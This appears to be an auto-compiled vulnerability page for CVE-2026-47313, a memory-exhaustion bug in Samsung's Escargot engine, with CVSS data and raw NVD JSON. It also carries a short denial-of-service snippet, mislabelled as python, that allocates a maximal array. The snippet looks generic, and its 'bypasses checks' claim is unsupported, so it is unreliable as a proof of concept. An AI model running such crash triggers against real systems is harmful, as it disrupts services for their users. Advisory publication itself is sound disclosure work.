Security Vulnerability Report
中文
CVE-2026-47313 CVSS 5.5 MEDIUM

CVE-2026-47313

Published: 2026-05-19 08:16:16
Last Modified: 2026-05-19 14:25:40

Description

Memory allocation with excessive size value vulnerability in Samsung Open Source Escargot allows Excessive Allocation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Samsung Escargot commit 590345cc6258317c5da850d846ce6baaf2afc2d3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2026-47313 // Description: Trigger excessive memory allocation in Samsung Escargot // Impact: Denial of Service (DoS) function triggerExcessiveAllocation() { try { // Attempt to allocate a massive buffer size // This value bypasses standard checks and causes OOM let size = 2147483647; // Max 32-bit signed integer let largeArray = new Array(size); // Alternative method using ArrayBuffer if Array constructor is protected let largeBuffer = new ArrayBuffer(size); console.log("Vulnerability triggered: System may become unresponsive."); } catch (e) { console.log("Exception caught: " + e.message); } } triggerExcessiveAllocation();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-47313", "sourceIdentifier": "[email protected]", "published": "2026-05-19T08:16:15.603", "lastModified": "2026-05-19T14:25:40.320", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memory allocation with excessive size value vulnerability in Samsung Open Source Escargot allows Excessive Allocation.\n\nThis issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-789"}]}], "references": [{"url": "https://github.com/Samsung/escargot/pull/1565", "source": "[email protected]"}]}}